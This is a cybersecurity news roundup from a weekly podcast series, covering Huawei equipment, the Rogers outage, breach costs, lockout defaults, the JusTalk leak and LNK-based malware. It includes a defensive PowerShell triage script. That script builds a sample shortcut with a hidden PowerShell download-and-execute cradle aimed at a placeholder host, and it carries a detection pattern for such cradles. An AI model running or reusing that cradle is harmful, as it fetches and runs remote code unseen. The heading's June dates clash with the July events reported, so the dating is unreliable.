Week in Review: Chinese, Huawei misdeeds, Poor cybersecurity training, Data breach costs

This week’s Cyber Security Headlines – Week in Review, June 6-10, is hosted by Rich Stroffolino with our guest, Deneen DeFiore, VP, CISO, United Airlines

Cyber Security Headlines – Week in Review is live every Friday at 12:30pm PT/3:30pm ET. Join us each week by registering for the open discussion at CISOSeries.com

FBI uncovers Chinese and Huawei misdeeds

Since at least 2017, federal officials have been investigating Chinese land purchases near critical infrastructure and pursuing what they saw as clear efforts to plant listening devices near sensitive military and government facilities. Among the most alarming findings was Chinese-made Huawei equipment atop cell towers near US military bases in the rural Midwest. According to multiple sources familiar with the matter, the FBI determined the equipment was capable of capturing and disrupting highly restricted Defense Department communications, including those used by US Strategic Command, which oversees the country's nuclear weapons. In addition, a proposed $100 million ornate Chinese garden at the National Arboretum in Washington DC included a pagoda that investigators noted would have been strategically placed on one of the highest points in Washington DC, just two miles from the US Capitol, a perfect spot for signals intelligence collection.

(CNN) 

Coding error to blame for Rogers outage 

Rogers Communications has disclosed the cause of the outage that began early on July 8 and left millions without cellphone and internet service. Rogers said a coding update deleted a routing filter, which allowed all possible routes to the Internet to propagate through its routers, flooding and overwhelming the core network. Rogers' CEO apologized for the massive service outage and said the company has hired a third party to investigate the root cause further. Officials from Rogers and a slew of other stakeholders appeared at a parliamentary committee on Monday in Ottawa to explain the cause of the outage and to outline the steps they are taking to ensure it doesn't happen again.

(CBC)

What is the cost of an average data breach?

According to a new report from IBM Security, the average cost of a data breach rose 2.6% year over year to an all-time record of $4.4 million in 2022, and is up 13% since the start of 2020. The report found that over 50% of organizations surveyed said they raised prices on products and services to offset the cost of breaches. The average cost isn't based only on the immediate expense of a breach, such as paying a ransom or containing the intrusion; it also accounts for longer-term expenses like regulatory fines and lost sales. Eighty-three percent of respondents reported having suffered more than one breach.

(CNET)

Windows adds brute force defense

Microsoft updated the defaults on Windows 11 Insider Preview builds to lock accounts for 10 minutes after 10 failed sign-in attempts. David Weston, Microsoft's vice president for OS security, said this is meant to mitigate Remote Desktop Protocol and other brute-force password vectors. Microsoft does warn that the change can expose accounts on open RDP ports to denial of service, since an attacker can deliberately trigger the lockout. The policy is already available in Windows 10; it is just not enabled by default.

(The Hacker News)
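The lockout policy described above, applied to an existing Windows 10 host and paired with a check for the lockout denial-of-service the article warns about. This is an added example, not code from the article or from Microsoft; it assumes an elevated local prompt, that the machine is not receiving a domain lockout policy that would override the local values, and that the Security log is being retained. The 10/10/10 values are the ones the article reports as the new Windows 11 defaults.

```powershell
# Added example (not from the article or Microsoft). Run from an elevated prompt.

# 1. Set the local account lockout policy: 10 failed attempts, a 10-minute lockout,
#    and a 10-minute window before the failed-attempt counter resets. On a
#    domain-joined machine the domain GPO overrides these local values.
net accounts /lockoutthreshold:10 /lockoutduration:10 /lockoutwindow:10

# 2. Confirm what is now in effect.
net accounts

# 3. Lockout can itself be abused for denial of service against an exposed RDP host,
#    so watch Security event 4740 ("A user account was locked out"). For 4740 the
#    TargetDomainName field carries the caller computer name; a single caller locking
#    out many distinct accounts is the pattern to alert on.
$since = (Get-Date).AddHours(-24)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4740; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Account = $data['TargetUserName']
            Caller  = $data['TargetDomainName']
        }
    } |
    Group-Object Caller |
    Sort-Object Count -Descending |
    Select-Object Count, Name, @{ n = 'Accounts'; e = { ($_.Group.Account | Sort-Object -Unique) -join ',' } }
```

If the third step shows one caller name responsible for lockouts across many accounts, the threshold is doing its job against password spraying, but it is also locking out legitimate users; the fix is to stop exposing RDP directly (VPN or gateway in front of it) rather than to raise the threshold.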

Thanks to our show sponsor, Snyk

Developers want to code fast and security wants to ship securely. And that’s why they both choose Snyk.
Backed by industry-leading security intelligence, Snyk provides real-time scanning with automated fixes and remediation advice right from the tools and workflows developers use.

Code, dependencies, containers, cloud infrastructure… all of it.

And while developers are building securely, Snyk gives security teams a bird’s eye view of all of their projects, so they can prioritize and focus their efforts in the right places.

Developer tested. Security approved. Start your free Snyk account at snyk.co/cybersecurity.

JusTalk logs leak

Last week, security researcher Anurag Sen discovered an exposed online database containing hundreds of gigabytes of log data for the messaging app JusTalk. The plaintext logs contained the sender's and recipient's phone numbers, the message content itself, and records of calls made. The logs also held granular location data, showing large clusters of users in the U.S., U.K., India, Saudi Arabia, Thailand and mainland China. The database was hosted by Huawei in China, and Shodan records show the server continually storing monthly chat logs. JusTalk claims its app uses end-to-end encryption, a claim the plaintext server-side logs undercut. This week, Sen discovered an undated ransom note left on the database, indicating it was accessed at least once by a malicious actor. Attempts to contact the company about the leak were unsuccessful.

(TechCrunch)

Poor training and communications hindering cybersecurity efforts

A new report from Tessian indicates that three in four companies in the UK and US experienced a security incident in the last year. The report highlights that employees don't understand their role in protecting the company: nearly half (45%) of workers said they didn't know whom to report a security incident to, and 30% believed they had no role in helping with cybersecurity. While 85% of employees participate in security awareness programs, almost two-thirds (64%) don't pay full attention during the training and over a third (36%) consider it boring. Mismanaged anti-phishing exercises are also a problem: half of employees said they have had negative experiences with phishing simulations.

(Infosecurity Magazine)

Hackers opting for new attack methods after Microsoft blocked macros by default

With Microsoft blocking Excel 4.0 and Visual Basic for Applications macros by default across Office apps, malicious actors are responding with new tactics, techniques, and procedures. A report from Proofpoint says adversaries are moving to container files such as ISO and RAR, as well as Windows Shortcut (LNK) files, to distribute malware, which Proofpoint calls a significant shift in the threat landscape. Container formats are attractive because, at the time, files mounted or extracted from them often did not carry the Mark-of-the-Web that the macro block keys on. "The number of campaigns containing LNK files increased 1,675% since October 2021," the enterprise security company noted, adding that the number of attacks using HTML attachments more than doubled from October 2021 to June 2022.

(The Hacker News)
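A triage script for the attachment types Proofpoint describes, as an added example that is not Proofpoint's or the article's code. It walks a directory of extracted attachments, flags container formats for extraction and re-scanning, and for each LNK reads the target and arguments that would run on double-click using the WScript.Shell COM object. The sample shortcut, its placeholder URL (`example.invalid`), the extension list and the list of suspicious target binaries are all constructed assumptions for the demonstration; the regular expression is a starting heuristic, not a complete detection.

```powershell
# Added example (not Proofpoint's or the article's). Constructed sample data below.
$sample = Join-Path $env:TEMP 'lnk-triage-demo'
New-Item -ItemType Directory -Force -Path $sample | Out-Null

# Constructed sample: a shortcut masquerading as a PDF that launches PowerShell with a
# hidden window and a download cradle. The URL is a placeholder, not a real host.
$shell = New-Object -ComObject WScript.Shell
$lnk = $shell.CreateShortcut((Join-Path $sample 'Invoice_2022.pdf.lnk'))
$lnk.TargetPath   = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$lnk.Arguments    = '-nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')"'
$lnk.IconLocation = 'C:\Windows\System32\shell32.dll,1'
$lnk.Save()

# Assumed list of container formats to flag (ISO and RAR are the ones the report names).
$containerExt = '.iso', '.img', '.rar', '.zip', '.7z'
# Assumed list of living-off-the-land binaries commonly named as the LNK target.
$suspiciousTargets = 'powershell.exe', 'cmd.exe', 'mshta.exe', 'rundll32.exe',
                     'wscript.exe', 'cscript.exe', 'regsvr32.exe'

function Test-LnkSuspicious {
    param([string]$Path)
    # CreateShortcut on an existing .lnk loads it rather than creating a new one.
    $s = $shell.CreateShortcut($Path)
    $target = [IO.Path]::GetFileName($s.TargetPath).ToLower()
    $reasons = @()
    if ($suspiciousTargets -contains $target) { $reasons += "target=$target" }
    if ($s.Arguments -match '(?i)-w(indowstyle)?\s+hidden|-enc|-e\s|IEX|DownloadString|http') {
        $reasons += 'arguments look like a download/execution cradle'
    }
    if ($Path -match '(?i)\.(pdf|docx?|xlsx?|txt)\.lnk$') { $reasons += 'double extension' }
    [pscustomobject]@{
        File       = Split-Path $Path -Leaf
        Target     = $s.TargetPath
        Arguments  = $s.Arguments
        Suspicious = $reasons.Count -gt 0
        Reasons    = $reasons -join '; '
    }
}

Get-ChildItem -Path $sample -File -Recurse | ForEach-Object {
    $f = $_   # capture: inside switch, $_ is the switch value, not the file
    switch ($f.Extension.ToLower()) {
        '.lnk' { Test-LnkSuspicious -Path $f.FullName }
        { $containerExt -contains $_ } {
            [pscustomobject]@{
                File = $f.Name; Target = ''; Arguments = ''
                Suspicious = $true; Reasons = 'container attachment; extract and re-scan contents'
            }
        }
    }
} | Format-Table -AutoSize -Wrap
```

Reading the shortcut through the COM object is safe for triage because it parses the LNK structure without executing the target; the output for the constructed sample shows the powershell.exe target, the hidden-window download cradle and the double extension, which is exactly what the user would not see from the PDF icon in Explorer.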